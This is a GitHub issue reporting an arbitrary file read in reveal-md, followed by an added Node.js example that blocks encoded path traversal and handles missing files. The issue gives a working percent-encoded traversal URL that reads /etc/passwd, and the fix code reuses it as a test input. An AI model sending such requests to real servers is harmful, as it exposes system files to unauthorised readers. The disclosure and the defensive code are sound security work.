webpro / reveal-md

reveal.js on steroids! Get beautiful reveal.js presentations from any Markdown file

Arbitrary file read leads to access to all local files

W0rty opened this issue · comments

Run an instance of reveal-md (from source code or Docker Hub), and then reach the following URL:

http://localhost:1948/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc.md%2F..%2Fetc%2Fpasswd

This will leak /etc/passwd of the local machine (or docker).

Moreover, if we try to reach a non-existent file, the server will crash because there is no catch for the exception "ENOENT" (no such file or directory).
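
The two problems reported above (encoded `../` sequences escaping the served directory, and an unhandled ENOENT) can be addressed with one containment check and one error mapping. The following is an added example, not part of the original issue and not reveal-md's own code; `resolveInsideBase`, `readMarkdown`, `makeSampleDir` and the status codes are assumptions chosen for illustration, and the sample directory is constructed.

```javascript
'use strict';
// Added example, not reveal-md's code. Function names and the
// status-code mapping are hypothetical.
const fs = require('node:fs');
const os = require('node:os');
const path = require('node:path');

// Map a raw (still percent-encoded) URL path to a file inside baseDir,
// or return null when the decoded path would leave that directory.
function resolveInsideBase(baseDir, rawUrlPath) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawUrlPath); // %2F becomes "/"
  } catch {
    return null; // malformed percent-encoding
  }
  if (decoded.includes('\0')) return null; // reject embedded NUL bytes
  const base = path.resolve(baseDir);
  // Resolve after decoding so "etc.md/../etc/passwd" is collapsed first.
  const target = path.resolve(base, '.' + path.sep + decoded);
  const rel = path.relative(base, target);
  if (rel === '..' || rel.startsWith('..' + path.sep) || path.isAbsolute(rel)) return null;
  return target;
}

// Read the file and turn failures into HTTP-style results instead of
// letting ENOENT propagate as an uncaught exception.
function readMarkdown(baseDir, rawUrlPath) {
  const target = resolveInsideBase(baseDir, rawUrlPath);
  if (target === null) return { status: 403, body: 'Forbidden' };
  try {
    return { status: 200, body: fs.readFileSync(target, 'utf8') };
  } catch (err) {
    if (err.code === 'ENOENT' || err.code === 'EISDIR') {
      return { status: 404, body: 'Not found' };
    }
    return { status: 500, body: 'Internal error' };
  }
}

// Constructed sample: a temporary slide directory with one Markdown file.
function makeSampleDir() {
  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'slides-'));
  fs.writeFileSync(path.join(dir, 'deck.md'), '# Title\n');
  return dir;
}

const TRAVERSAL = '/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc.md%2F..%2Fetc%2Fpasswd'; // path from the report
const dir = makeSampleDir();
for (const p of ['/deck.md', '/missing.md', TRAVERSAL]) {
  console.log(readMarkdown(dir, p).status, p); // 200, 404, 403
}
```

`path.resolve` does not follow symlinks, so a link inside the base directory can still point outside it; comparing `fs.realpathSync` results closes that gap.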